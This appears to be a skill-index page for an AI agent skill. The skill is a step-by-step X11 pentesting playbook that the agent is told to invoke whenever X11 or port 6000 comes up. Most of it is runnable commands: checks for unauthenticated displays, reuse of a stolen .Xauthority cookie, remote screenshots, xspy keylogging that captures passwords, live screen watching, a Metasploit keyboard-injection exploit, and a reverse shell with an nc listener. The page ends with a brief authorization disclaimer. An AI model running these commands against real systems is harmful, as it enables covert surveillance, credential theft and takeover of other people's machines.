OpenSkillIndex← back to search

Hacktricks-skills x11-pentesting

Perform X11 (X Window System) security assessments and exploitation on port 6000. Use this skill whenever the user mentions X11, port 6000, X Window System, graphical interface pentesting, or needs to enumerate/exploit unauthenticated X11 access. This includes checking for anonymous connections, capturing screenshots, keylogging, remote desktop viewing, and obtaining shells through X11 vulnerabilities.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/6000-pentesting-x11/SKILL.MD
source content

X11 Pentesting Skill

A comprehensive skill for assessing and exploiting X11 (X Window System) vulnerabilities on port 6000.

When to Use This Skill

Use this skill when:

  • Port 6000 is open on a target and you need to assess X11 security
  • You need to check for anonymous/unauthenticated X11 access
  • You want to enumerate X11 sessions and display information
  • You need to capture screenshots from a remote X11 display
  • You want to monitor keystrokes on an X11 session
  • You need to view a remote desktop through X11
  • You're attempting to gain shell access through X11 exploits

Quick Start

# Check for open X11 access
nmap -sV --script x11-access -p 6000 <TARGET_IP>

# Verify connection
xdpyinfo -display <TARGET_IP>:0

Enumeration

Check for Anonymous Connection

Use these methods to detect if X11 allows unauthenticated access:

# Nmap script
nmap -sV --script x11-access -p 6000 <TARGET_IP>

# Metasploit scanner
msfconsole
use auxiliary/scanner/x11/open_x11
set RHOSTS <TARGET_IP>
run

Local Enumeration

The 

.Xauthority
file in a user's home directory contains the MIT magic cookie used for X11 authorization:

# View the authority file
xxd ~/.Xauthority

# Or check XAUTHORITY environment variable
echo $XAUTHORITY

The cookie is a 128-bit key stored in plain text. To use a captured cookie:

export XAUTHORITY=/path/to/.Xauthority

Enumerate Active Sessions

# Check active sessions
w

# Look for display information (e.g., :0, :1)
# Example output shows user on tty7 with display :0 running xfce4-session

Connection Verification

Before attempting exploitation, verify you can connect to the X11 server:

# Basic connection test
xdpyinfo -display <TARGET_IP>:<DISPLAY>

# Get window tree information
xwininfo -root -tree -display <TARGET_IP>:<DISPLAY>

# Example
xwininfo -root -tree -display 10.5.5.12:0

Screenshots

Capture screenshots from a remote X11 display:

# Capture to XWD format
xwd -root -screen -silent -display <TARGET_IP>:0 > screenshot.xwd

# Convert to PNG (requires ImageMagick)
convert screenshot.xwd screenshot.png

# Or use xwd directly with display
xwd -display <TARGET_IP>:0 -root -silent | convert - xwd.png

Keylogging

Use xspy to capture keystrokes from an X11 session:

# Install xspy if not available
# xspy is available in Kali Linux

# Start keylogging
xspy <TARGET_IP>

# Example output shows captured keystrokes including passwords

Remote Desktop Viewing

Method 1: xrdp.py

# Download xrdp.py from security research repositories
./xrdp.py <TARGET_IP>:0

Method 2: xwatchwin for Live Viewing

# First, get the window ID
xwininfo -root -display <TARGET_IP>:0

# Note the Window id (e.g., 0x45 for root window)

# Start live viewing
./xwatchwin <TARGET_IP>:0 -w <WINDOW_ID>

# Example
./xwatchwin 10.9.xx.xx:0 -w 0x45

# With verbose output and update time
./xwatchwin -v -u 100 <TARGET_IP>:0 -w 0x45

Shell Access

Metasploit Method

msfconsole
use exploit/unix/x11/x11_keyboard_exec
set RHOSTS <TARGET_IP>
set DISPLAY 0
run

Reverse Shell via xrdp.py

# Start xrdp without display mode
./xrdp.py <TARGET_IP>:0 --no-disp

# In the interface, select R-shell option

# On your local machine, start a netcat listener
nc -lvp 5555

# Enter your IP and port in the R-shell option in xrdp interface
# Click R-shell to establish reverse connection

Workflow Summary

  1. Reconnaissance: Scan for port 6000 and check for anonymous access
  2. Enumeration: Verify connection and gather display/window information
  3. Exploitation: Choose appropriate method based on access level
    • Screenshots for visual reconnaissance
    • Keylogging for credential capture
    • Remote desktop for interactive access
    • Shell exploits for command execution
  4. Post-Exploitation: Use captured credentials or established access for further operations

Tools Required

  • nmap
    - Port scanning and X11 detection
  • xdpyinfo
    - X11 display information
  • xwininfo
    - Window information
  • xwd
    - X Window Dump (screenshots)
  • ImageMagick
    (convert) - Image format conversion
  • xspy
    - Keylogging (Kali Linux)
  • xrdp.py
    - Remote desktop and shell access
  • xwatchwin
    - Live window viewing
  • Metasploit
    - Exploitation framework

Safety and Legal Considerations

  • Only test systems you have explicit authorization to assess
  • X11 exploitation can be detected by security monitoring
  • Captured keystrokes may include sensitive credentials
  • Document all findings for your security assessment report

References